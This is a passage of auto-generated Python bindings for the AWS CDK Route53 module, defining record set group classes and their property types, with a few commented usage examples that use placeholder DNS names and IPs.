return "AliasTargetProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSet.GeoLocationProperty",
jsii_struct_bases=[],
name_mapping={
"continent_code": "continentCode",
"country_code": "countryCode",
"subdivision_code": "subdivisionCode",
},
)
class GeoLocationProperty:
def __init__(
self,
*,
continent_code: typing.Optional[builtins.str] = None,
country_code: typing.Optional[builtins.str] = None,
subdivision_code: typing.Optional[builtins.str] = None,
) -> None:
'''
:param continent_code: ``CfnRecordSet.GeoLocationProperty.ContinentCode``.
:param country_code: ``CfnRecordSet.GeoLocationProperty.CountryCode``.
:param subdivision_code: ``CfnRecordSet.GeoLocationProperty.SubdivisionCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if continent_code is not None:
self._values["continent_code"] = continent_code
if country_code is not None:
self._values["country_code"] = country_code
if subdivision_code is not None:
self._values["subdivision_code"] = subdivision_code
@builtins.property
def continent_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSet.GeoLocationProperty.ContinentCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-continentcode
'''
result = self._values.get("continent_code")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def country_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSet.GeoLocationProperty.CountryCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-countrycode
'''
result = self._values.get("country_code")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def subdivision_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSet.GeoLocationProperty.SubdivisionCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-subdivisioncode
'''
result = self._values.get("subdivision_code")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GeoLocationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
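# Illustrative usage (not part of the generated bindings): creating a weighted
# ``AWS::Route53::RecordSet`` in an existing zone. The hosted zone ID and IP
# address are placeholders; ``stack`` is assumed to be an existing Construct
# scope. Note that ``ttl`` is a string in this L1 resource, and ``weight``
# requires a ``set_identifier`` to distinguish records that share a name and
# type.
#
#     record = CfnRecordSet(
#         stack, "WeightedRecord",
#         name="www.example.com.",
#         type="A",
#         hosted_zone_id="Z00000000000000000000",
#         resource_records=["192.0.2.44"],
#         ttl="300",
#         weight=100,
#         set_identifier="primary",
#     )
#
# Alias records instead set ``alias_target`` to a
# ``CfnRecordSet.AliasTargetProperty`` (defined above) and omit
# ``resource_records`` and ``ttl``.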
@jsii.implements(aws_cdk.core.IInspectable)
class CfnRecordSetGroup(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroup",
):
'''A CloudFormation ``AWS::Route53::RecordSetGroup``.
:cloudformationResource: AWS::Route53::RecordSetGroup
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
comment: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
record_sets: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.RecordSetProperty"]]]] = None,
) -> None:
'''Create a new ``AWS::Route53::RecordSetGroup``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param comment: ``AWS::Route53::RecordSetGroup.Comment``.
:param hosted_zone_id: ``AWS::Route53::RecordSetGroup.HostedZoneId``.
:param hosted_zone_name: ``AWS::Route53::RecordSetGroup.HostedZoneName``.
:param record_sets: ``AWS::Route53::RecordSetGroup.RecordSets``.
'''
props = CfnRecordSetGroupProps(
comment=comment,
hosted_zone_id=hosted_zone_id,
hosted_zone_name=hosted_zone_name,
record_sets=record_sets,
)
jsii.create(CfnRecordSetGroup, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="comment")
def comment(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-comment
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "comment"))
@comment.setter
def comment(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "comment", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneId")
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-hostedzoneid
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "hostedZoneId"))
@hosted_zone_id.setter
def hosted_zone_id(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "hostedZoneId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneName")
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-hostedzonename
'''
return typing.cast(typing.Optional[builtins.str], jsii.get(self, "hostedZoneName"))
@hosted_zone_name.setter
def hosted_zone_name(self, value: typing.Optional[builtins.str]) -> None:
jsii.set(self, "hostedZoneName", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="recordSets")
def record_sets(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.RecordSetProperty"]]]]:
'''``AWS::Route53::RecordSetGroup.RecordSets``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-recordsets
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.RecordSetProperty"]]]], jsii.get(self, "recordSets"))
@record_sets.setter
def record_sets(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.RecordSetProperty"]]]],
) -> None:
jsii.set(self, "recordSets", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroup.AliasTargetProperty",
jsii_struct_bases=[],
name_mapping={
"dns_name": "dnsName",
"hosted_zone_id": "hostedZoneId",
"evaluate_target_health": "evaluateTargetHealth",
},
)
class AliasTargetProperty:
def __init__(
self,
*,
dns_name: builtins.str,
hosted_zone_id: builtins.str,
evaluate_target_health: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
) -> None:
'''
:param dns_name: ``CfnRecordSetGroup.AliasTargetProperty.DNSName``.
:param hosted_zone_id: ``CfnRecordSetGroup.AliasTargetProperty.HostedZoneId``.
:param evaluate_target_health: ``CfnRecordSetGroup.AliasTargetProperty.EvaluateTargetHealth``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html
'''
self._values: typing.Dict[str, typing.Any] = {
"dns_name": dns_name,
"hosted_zone_id": hosted_zone_id,
}
if evaluate_target_health is not None:
self._values["evaluate_target_health"] = evaluate_target_health
@builtins.property
def dns_name(self) -> builtins.str:
'''``CfnRecordSetGroup.AliasTargetProperty.DNSName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-dnshostname
'''
result = self._values.get("dns_name")
assert result is not None, "Required property 'dns_name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''``CfnRecordSetGroup.AliasTargetProperty.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def evaluate_target_health(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnRecordSetGroup.AliasTargetProperty.EvaluateTargetHealth``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-aliastarget.html#cfn-route53-aliastarget-evaluatetargethealth
'''
result = self._values.get("evaluate_target_health")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "AliasTargetProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
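# Illustrative usage (hedged example, not part of the generated bindings):
# constructing an ``AliasTargetProperty`` for an alias record. The DNS name
# and hosted zone ID below are placeholder values, not real resources.
#
#   alias_target = CfnRecordSetGroup.AliasTargetProperty(
#       dns_name="example-target.elb.amazonaws.com",
#       hosted_zone_id="Z0000000EXAMPLE",
#       evaluate_target_health=True,
#   )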
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroup.GeoLocationProperty",
jsii_struct_bases=[],
name_mapping={
"continent_code": "continentCode",
"country_code": "countryCode",
"subdivision_code": "subdivisionCode",
},
)
class GeoLocationProperty:
def __init__(
self,
*,
continent_code: typing.Optional[builtins.str] = None,
country_code: typing.Optional[builtins.str] = None,
subdivision_code: typing.Optional[builtins.str] = None,
) -> None:
'''
:param continent_code: ``CfnRecordSetGroup.GeoLocationProperty.ContinentCode``.
:param country_code: ``CfnRecordSetGroup.GeoLocationProperty.CountryCode``.
:param subdivision_code: ``CfnRecordSetGroup.GeoLocationProperty.SubdivisionCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if continent_code is not None:
self._values["continent_code"] = continent_code
if country_code is not None:
self._values["country_code"] = country_code
if subdivision_code is not None:
self._values["subdivision_code"] = subdivision_code
@builtins.property
def continent_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.GeoLocationProperty.ContinentCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordsetgroup-geolocation-continentcode
'''
result = self._values.get("continent_code")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def country_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.GeoLocationProperty.CountryCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-countrycode
'''
result = self._values.get("country_code")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def subdivision_code(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.GeoLocationProperty.SubdivisionCode``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset-geolocation.html#cfn-route53-recordset-geolocation-subdivisioncode
'''
result = self._values.get("subdivision_code")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "GeoLocationProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroup.RecordSetProperty",
jsii_struct_bases=[],
name_mapping={
"name": "name",
"type": "type",
"alias_target": "aliasTarget",
"comment": "comment",
"failover": "failover",
"geo_location": "geoLocation",
"health_check_id": "healthCheckId",
"hosted_zone_id": "hostedZoneId",
"hosted_zone_name": "hostedZoneName",
"multi_value_answer": "multiValueAnswer",
"region": "region",
"resource_records": "resourceRecords",
"set_identifier": "setIdentifier",
"ttl": "ttl",
"weight": "weight",
},
)
class RecordSetProperty:
def __init__(
self,
*,
name: builtins.str,
type: builtins.str,
alias_target: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.AliasTargetProperty"]] = None,
comment: typing.Optional[builtins.str] = None,
failover: typing.Optional[builtins.str] = None,
geo_location: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.GeoLocationProperty"]] = None,
health_check_id: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
multi_value_answer: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
region: typing.Optional[builtins.str] = None,
resource_records: typing.Optional[typing.Sequence[builtins.str]] = None,
set_identifier: typing.Optional[builtins.str] = None,
ttl: typing.Optional[builtins.str] = None,
weight: typing.Optional[jsii.Number] = None,
) -> None:
'''
:param name: ``CfnRecordSetGroup.RecordSetProperty.Name``.
:param type: ``CfnRecordSetGroup.RecordSetProperty.Type``.
:param alias_target: ``CfnRecordSetGroup.RecordSetProperty.AliasTarget``.
:param comment: ``CfnRecordSetGroup.RecordSetProperty.Comment``.
:param failover: ``CfnRecordSetGroup.RecordSetProperty.Failover``.
:param geo_location: ``CfnRecordSetGroup.RecordSetProperty.GeoLocation``.
:param health_check_id: ``CfnRecordSetGroup.RecordSetProperty.HealthCheckId``.
:param hosted_zone_id: ``CfnRecordSetGroup.RecordSetProperty.HostedZoneId``.
:param hosted_zone_name: ``CfnRecordSetGroup.RecordSetProperty.HostedZoneName``.
:param multi_value_answer: ``CfnRecordSetGroup.RecordSetProperty.MultiValueAnswer``.
:param region: ``CfnRecordSetGroup.RecordSetProperty.Region``.
:param resource_records: ``CfnRecordSetGroup.RecordSetProperty.ResourceRecords``.
:param set_identifier: ``CfnRecordSetGroup.RecordSetProperty.SetIdentifier``.
:param ttl: ``CfnRecordSetGroup.RecordSetProperty.TTL``.
:param weight: ``CfnRecordSetGroup.RecordSetProperty.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html
'''
self._values: typing.Dict[str, typing.Any] = {
"name": name,
"type": type,
}
if alias_target is not None:
self._values["alias_target"] = alias_target
if comment is not None:
self._values["comment"] = comment
if failover is not None:
self._values["failover"] = failover
if geo_location is not None:
self._values["geo_location"] = geo_location
if health_check_id is not None:
self._values["health_check_id"] = health_check_id
if hosted_zone_id is not None:
self._values["hosted_zone_id"] = hosted_zone_id
if hosted_zone_name is not None:
self._values["hosted_zone_name"] = hosted_zone_name
if multi_value_answer is not None:
self._values["multi_value_answer"] = multi_value_answer
if region is not None:
self._values["region"] = region
if resource_records is not None:
self._values["resource_records"] = resource_records
if set_identifier is not None:
self._values["set_identifier"] = set_identifier
if ttl is not None:
self._values["ttl"] = ttl
if weight is not None:
self._values["weight"] = weight
@builtins.property
def name(self) -> builtins.str:
'''``CfnRecordSetGroup.RecordSetProperty.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-name
'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def type(self) -> builtins.str:
'''``CfnRecordSetGroup.RecordSetProperty.Type``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-type
'''
result = self._values.get("type")
assert result is not None, "Required property 'type' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def alias_target(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.AliasTargetProperty"]]:
'''``CfnRecordSetGroup.RecordSetProperty.AliasTarget``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-aliastarget
'''
result = self._values.get("alias_target")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.AliasTargetProperty"]], result)
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def failover(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.Failover``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-failover
'''
result = self._values.get("failover")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def geo_location(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.GeoLocationProperty"]]:
'''``CfnRecordSetGroup.RecordSetProperty.GeoLocation``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-geolocation
'''
result = self._values.get("geo_location")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnRecordSetGroup.GeoLocationProperty"]], result)
@builtins.property
def health_check_id(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.HealthCheckId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-healthcheckid
'''
result = self._values.get("health_check_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-hostedzonename
'''
result = self._values.get("hosted_zone_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def multi_value_answer(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnRecordSetGroup.RecordSetProperty.MultiValueAnswer``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-multivalueanswer
'''
result = self._values.get("multi_value_answer")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def region(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-region
'''
result = self._values.get("region")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def resource_records(self) -> typing.Optional[typing.List[builtins.str]]:
'''``CfnRecordSetGroup.RecordSetProperty.ResourceRecords``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-resourcerecords
'''
result = self._values.get("resource_records")
return typing.cast(typing.Optional[typing.List[builtins.str]], result)
@builtins.property
def set_identifier(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.SetIdentifier``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-setidentifier
'''
result = self._values.get("set_identifier")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def ttl(self) -> typing.Optional[builtins.str]:
'''``CfnRecordSetGroup.RecordSetProperty.TTL``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-ttl
'''
result = self._values.get("ttl")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def weight(self) -> typing.Optional[jsii.Number]:
'''``CfnRecordSetGroup.RecordSetProperty.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html#cfn-route53-recordset-weight
'''
result = self._values.get("weight")
return typing.cast(typing.Optional[jsii.Number], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RecordSetProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
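# Illustrative usage (placeholder values, not part of the generated bindings):
# a weighted A record. ``weight`` and ``set_identifier`` are used together for
# weighted routing; ``resource_records`` holds the record values as strings,
# and ``ttl`` is a string in this low-level (Cfn) layer.
#
#   record = CfnRecordSetGroup.RecordSetProperty(
#       name="app.example.com.",
#       type="A",
#       resource_records=["203.0.113.10"],
#       ttl="300",
#       weight=80,
#       set_identifier="primary",
#   )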
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetGroupProps",
jsii_struct_bases=[],
name_mapping={
"comment": "comment",
"hosted_zone_id": "hostedZoneId",
"hosted_zone_name": "hostedZoneName",
"record_sets": "recordSets",
},
)
class CfnRecordSetGroupProps:
def __init__(
self,
*,
comment: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
record_sets: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, CfnRecordSetGroup.RecordSetProperty]]]] = None,
) -> None:
'''Properties for defining an ``AWS::Route53::RecordSetGroup``.
:param comment: ``AWS::Route53::RecordSetGroup.Comment``.
:param hosted_zone_id: ``AWS::Route53::RecordSetGroup.HostedZoneId``.
:param hosted_zone_name: ``AWS::Route53::RecordSetGroup.HostedZoneName``.
:param record_sets: ``AWS::Route53::RecordSetGroup.RecordSets``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if comment is not None:
self._values["comment"] = comment
if hosted_zone_id is not None:
self._values["hosted_zone_id"] = hosted_zone_id
if hosted_zone_name is not None:
self._values["hosted_zone_name"] = hosted_zone_name
if record_sets is not None:
self._values["record_sets"] = record_sets
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-comment
'''
result = self._values.get("comment")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_id(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def hosted_zone_name(self) -> typing.Optional[builtins.str]:
'''``AWS::Route53::RecordSetGroup.HostedZoneName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-hostedzonename
'''
result = self._values.get("hosted_zone_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def record_sets(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnRecordSetGroup.RecordSetProperty]]]]:
'''``AWS::Route53::RecordSetGroup.RecordSets``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-recordsetgroup.html#cfn-route53-recordsetgroup-recordsets
'''
result = self._values.get("record_sets")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnRecordSetGroup.RecordSetProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnRecordSetGroupProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
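# Illustrative usage (placeholder values): grouping record sets into a single
# ``AWS::Route53::RecordSetGroup``. In CloudFormation you specify either
# ``hosted_zone_id`` or ``hosted_zone_name`` for the group, not both.
#
#   group_props = CfnRecordSetGroupProps(
#       hosted_zone_name="example.com.",
#       comment="Records managed as one group",
#       record_sets=[
#           CfnRecordSetGroup.RecordSetProperty(
#               name="www.example.com.",
#               type="CNAME",
#               resource_records=["app.example.com."],
#               ttl="300",
#           ),
#       ],
#   )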
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnRecordSetProps",
jsii_struct_bases=[],
name_mapping={
"name": "name",
"type": "type",
"alias_target": "aliasTarget",
"comment": "comment",
"failover": "failover",
"geo_location": "geoLocation",
"health_check_id": "healthCheckId",
"hosted_zone_id": "hostedZoneId",
"hosted_zone_name": "hostedZoneName",
"multi_value_answer": "multiValueAnswer",
"region": "region",
"resource_records": "resourceRecords",
"set_identifier": "setIdentifier",
"ttl": "ttl",
"weight": "weight",
},
)
class CfnRecordSetProps:
def __init__(
self,
*,
name: builtins.str,
type: builtins.str,
alias_target: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.AliasTargetProperty]] = None,
comment: typing.Optional[builtins.str] = None,
failover: typing.Optional[builtins.str] = None,
geo_location: typing.Optional[typing.Union[aws_cdk.core.IResolvable, CfnRecordSet.GeoLocationProperty]] = None,
health_check_id: typing.Optional[builtins.str] = None,
hosted_zone_id: typing.Optional[builtins.str] = None,
hosted_zone_name: typing.Optional[builtins.str] = None,
multi_value_answer: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
region: typing.Optional[builtins.str] = None,
resource_records: typing.Optional[typing.Sequence[builtins.str]] = None,
set_identifier: typing.Optional[builtins.str] = None,
ttl: typing.Optional[builtins.str] = None,
weight: typing.Optional[jsii.Number] = None,
) -> None:
'''Properties for defining an ``AWS::Route53::RecordSet``.
:param name: ``AWS::Route53::RecordSet.Name``.
:param type: ``AWS::Route53::RecordSet.Type``.
:param alias_target: ``AWS::Route53::RecordSet.AliasTarget``.
:param comment: ``AWS::Route53::RecordSet.Comment``.
:param failover: ``AWS::Route53::RecordSet.Failover``.
:param geo_location: ``AWS::Route53::RecordSet.GeoLocation``.
:param health_check_id: ``AWS::Route53::RecordSet.HealthCheckId``.
:param hosted_zone_id: ``AWS::Route53::RecordSet.HostedZoneId``.
:param hosted_zone_name: ``AWS::Route53::RecordSet.HostedZoneName``.
:param multi_value_answer: ``AWS::Route53::RecordSet.MultiValueAnswer``.
:param region: ``AWS::Route53::RecordSet.Region``.
:param resource_records: ``AWS::Route53::RecordSet.ResourceRecords``.
:param set_identifier: ``AWS::Route53::RecordSet.SetIdentifier``.
:param ttl: ``AWS::Route53::RecordSet.TTL``.
:param weight: ``AWS::Route53::RecordSet.Weight``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-recordset.html
'''
self._values: typing.Dict[str, typing.Any] = {
"name": name,
"type": type,
}
if alias_target is not None:
self._values["alias_target"] = alias_target
if comment is not None:
